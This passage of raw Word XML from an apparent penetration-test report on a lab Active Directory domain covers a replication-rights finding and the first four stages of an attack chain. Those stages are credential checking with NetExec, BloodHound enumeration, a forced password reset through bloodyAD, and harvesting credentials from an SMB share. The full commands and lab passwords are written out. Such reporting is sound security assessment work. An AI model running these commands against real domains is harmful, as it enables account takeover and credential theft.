        <w:t xml:space="preserve">Critical Directory Privilege: </w:t>
      </w:r>
      <w:r w:rsidRPr="0087495E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>The custom Server Admins group was assigned extended replication rights (DS-Replication-Get-Changes and DS-Replication-Get-Changes-All) on the domain root object.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="599C9487" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="0087495E" w:rsidRDefault="00A25106">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0087495E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="66FAEB9D" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="0040297F" w:rsidRDefault="00A25106">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="360" w:after="120"/>
      </w:pPr>
      <w:r w:rsidRPr="0040297F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>5. Results and Findings (12-Stage Attack Chain Narrative)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="432DC771" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="0040297F" w:rsidRDefault="00A25106">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r w:rsidRPr="0040297F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t>This section presents the detailed operational execution of the 12-stage attack path. Every stage includes explicit command invocation syntax, technical analysis of the exploited misconfiguration, and annotated visual evidence.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E4918FC" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="0040297F" w:rsidRDefault="00A25106">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="280" w:after="80"/>
      </w:pPr>
      <w:r w:rsidRPr="0040297F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>5.1 Stage 1: Initial Access &amp; Foothold Verification</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65505AB4" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="0040297F" w:rsidRDefault="00A25106">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r w:rsidRPr="0040297F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t>The engagement commenced with a single set of low-privileged domain credentials provided for the user account hporter (Gr8hambino!). Using NetExec (nxc), SMB connectivity and credential validity were confirmed against the Domain Controller (DC01 at 172.16.8.3).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56B49F74" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="0040297F" w:rsidRDefault="00A25106">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r w:rsidRPr="0040297F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Command Invocation: </w:t>
      </w:r>
      <w:r w:rsidRPr="0040297F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t>Command Execution Syntax:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="0" w:type="auto"/>
        <w:jc w:val="center"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9360"/>
      </w:tblGrid>
      <w:tr w:rsidR="0040297F" w:rsidRPr="0040297F" w14:paraId="02377CEF" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9360" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="D0D7DE"/>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="1F4E79"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D0D7DE"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="D0D7DE"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F4F5F7"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="150" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="150" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="6A560CD7" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="0040297F" w:rsidRDefault="00A25106">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="0040297F">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">nxc smb 172.16.8.3 -u hporter -p 'Gr8hambino!' -d </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="0040297F">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>inlanefreight.local</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="25C094B9" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="0040297F" w:rsidRDefault="00E142F8">
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="68164404" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="0040297F" w:rsidRDefault="00A25106">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r w:rsidRPr="0040297F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t>As shown in Figure 1, the SMB login succeeded, returning '+' status and confirming that the hporter account was active and authenticated successfully against INLANEFREIGHT.LOCAL.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="393C30E2" w14:textId="753EA4BC" w:rsidR="00E142F8" w:rsidRPr="0040297F" w:rsidRDefault="00AE36D8">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="200" w:after="40"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7F42AA9E" wp14:editId="439BC1EB">
            <wp:extent cx="5943600" cy="5130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13080"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="552C295D" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="0040297F" w:rsidRDefault="00A25106">
      <w:pPr>
        <w:spacing w:before="40"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="0040297F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>Figure 1: NetExec SMB Credential Verification for hporter against DC01</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A3BB7C5" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="0040297F" w:rsidRDefault="00A25106">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="280" w:after="80"/>
      </w:pPr>
      <w:r w:rsidRPr="0040297F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>5.2 Stage 2: Active Directory Enumeration (BloodHound)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0005B206" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="0040297F" w:rsidRDefault="00A25106">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r w:rsidRPr="0040297F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t>Following initial foothold validation, BloodHound Python ingester (bloodhound-python) was executed to extract directory objects, group memberships, trust relationships, and Access Control Lists (ACLs) via LDAP queries.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="758B3F28" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="0040297F" w:rsidRDefault="00A25106">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r w:rsidRPr="0040297F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Command Invocation: </w:t>
      </w:r>
      <w:r w:rsidRPr="0040297F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t>Command Execution Syntax:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="0" w:type="auto"/>
        <w:jc w:val="center"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9360"/>
      </w:tblGrid>
      <w:tr w:rsidR="0040297F" w:rsidRPr="0040297F" w14:paraId="39B87840" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9360" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="D0D7DE"/>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="1F4E79"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D0D7DE"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="D0D7DE"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F4F5F7"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="150" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="150" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="7A02DD76" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="0040297F" w:rsidRDefault="00A25106">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="0040297F">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">bloodhound-python -u hporter -p 'Gr8hambino!' -d </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="0040297F">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>inlanefreight.local</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="0040297F">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> -ns 172.16.8.3 -c All --zip</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5AF6F047" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="0040297F" w:rsidRDefault="00A25106">
            <w:pPr>
              <w:spacing w:after="40" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="0040297F">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>sudo neo4j start</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4E6CA9BC" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="0040297F" w:rsidRDefault="00A25106">
            <w:pPr>
              <w:spacing w:after="40" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="0040297F">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>bloodhound</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4EF8E538" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="0040297F" w:rsidRDefault="00A25106">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0040297F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t>BloodHound</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0040297F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> graph analysis revealed an actionable attack path: the user account hporter possessed explicit ForceChangePassword rights over the user account ssmalls (see Figure 2).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D7E7EC5" w14:textId="4D5822F3" w:rsidR="00E142F8" w:rsidRPr="0040297F" w:rsidRDefault="00AE36D8">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="200" w:after="40"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4941A888" wp14:editId="058E2EA6">
            <wp:extent cx="594360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52650"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="38D214D9" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="0040297F" w:rsidRDefault="00A25106">
      <w:pPr>
        <w:spacing w:before="40"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="0040297F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>Figure 2: BloodHound ACL Analysis Revealing ForceChangePassword Right over ssmalls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E769508" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="0040297F" w:rsidRDefault="00A25106">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="280" w:after="80"/>
      </w:pPr>
      <w:r w:rsidRPr="0040297F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>5.3 Stage 3: Abuse of ForceChangePassword ACL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="564049B1" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="0040297F" w:rsidRDefault="00A25106">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r w:rsidRPr="0040297F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t>An excessive delegated ACL allowed hporter to reset the password of ssmalls without knowing ssmalls' current password. Using bloodyAD, ssmalls' password was forcefully updated to 'mazoniakid'.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B57F9D1" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="0040297F" w:rsidRDefault="00A25106">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r w:rsidRPr="0040297F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Command Invocation: </w:t>
      </w:r>
      <w:r w:rsidRPr="0040297F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t>Command Execution Syntax:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="0" w:type="auto"/>
        <w:jc w:val="center"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9360"/>
      </w:tblGrid>
      <w:tr w:rsidR="0040297F" w:rsidRPr="0040297F" w14:paraId="04E10D16" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9360" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="D0D7DE"/>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="1F4E79"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D0D7DE"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="D0D7DE"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F4F5F7"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="150" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="150" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="7917C40E" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="0040297F" w:rsidRDefault="00A25106">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="0040297F">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">bloodyAD --host 172.16.8.3 -d </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="0040297F">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>inlanefreight.local</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="0040297F">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> -u hporter -p 'Gr8hambino!' set password ssmalls mazoniakid</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1FC9341D" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="0040297F" w:rsidRDefault="00A25106">
            <w:pPr>
              <w:spacing w:after="40" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="0040297F">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">nxc smb 172.16.8.3 -u ssmalls -p 'mazoniakid' -d </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="0040297F">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>inlanefreight.local</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="48BFC295" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="0040297F" w:rsidRDefault="00E142F8">
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7F98B3CE" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="0040297F" w:rsidRDefault="00A25106">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r w:rsidRPr="0040297F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t>Figure 3 confirms that ssmalls' password reset was processed successfully by LDAP, allowing immediate SMB authentication under the ssmalls identity.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2036D256" w14:textId="12E80AA3" w:rsidR="00E142F8" w:rsidRPr="0040297F" w:rsidRDefault="00AE36D8">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="200" w:after="40"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6AECD99E" wp14:editId="4BE48ACB">
            <wp:extent cx="5943600" cy="18046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804670"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="722FE151" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="0040297F" w:rsidRDefault="00A25106">
      <w:pPr>
        <w:spacing w:before="40"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="0040297F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>Figure 3: Password Reset Execution over ssmalls via bloodyAD and NetExec SMB Verification</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31E3C37B" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="0040297F" w:rsidRDefault="00A25106">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="280" w:after="80"/>
      </w:pPr>
      <w:r w:rsidRPr="0040297F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>5.4 Stage 4: File Share Credential Harvesting</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09CF249F" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="0040297F" w:rsidRDefault="00A25106">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r w:rsidRPr="0040297F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t>Authenticated as ssmalls, accessible network shares on DC01 were enumerated using NetExec spidering. A department share named 'Department Shares' was accessible to all Domain Users.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ABCA08E" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="0040297F" w:rsidRDefault="00A25106">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r w:rsidRPr="0040297F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Command Invocation: </w:t>
      </w:r>
      <w:r w:rsidRPr="0040297F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t>Command Execution Syntax:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="0" w:type="auto"/>
        <w:jc w:val="center"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9360"/>
      </w:tblGrid>
      <w:tr w:rsidR="0040297F" w:rsidRPr="0040297F" w14:paraId="44CDE6C8" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9360" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="D0D7DE"/>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="1F4E79"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D0D7DE"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="D0D7DE"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F4F5F7"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="150" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="150" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="61685BA6" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="0040297F" w:rsidRDefault="00A25106">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="0040297F">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t xml:space="preserve">nxc smb 172.16.8.3 -u ssmalls -p 'mazoniakid' -d </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="0040297F">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>inlanefreight.local</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="0040297F">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> -M spider_plus --share 'Department Shares'</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7B90D701" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="0040297F" w:rsidRDefault="00A25106">
            <w:pPr>
              <w:spacing w:after="40" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="0040297F">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>smbclient -U ssmalls '//172.16.8.3/Department Shares'</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7E952A2F" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="0040297F" w:rsidRDefault="00A25106">
            <w:pPr>
              <w:spacing w:after="40" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="0040297F">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t># &gt; cd IT\Private\Development\</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3B8051C6" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="0040297F" w:rsidRDefault="00A25106">
            <w:pPr>
              <w:spacing w:after="40" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="0040297F">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t># &gt; get "SQL Express Backup.ps1"</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2A1B55EF" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="0040297F" w:rsidRDefault="00E142F8">
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="75BC6C0A" w14:textId="2D54ED86" w:rsidR="00E142F8" w:rsidRDefault="00A25106">
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0040297F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">Inspecting the downloaded PowerShell script 'SQL Express Backup.ps1' revealed embedded plaintext service credentials (see Figure 4): </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0040297F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t>backupadm</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0040297F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0040297F">
        <w:rPr>
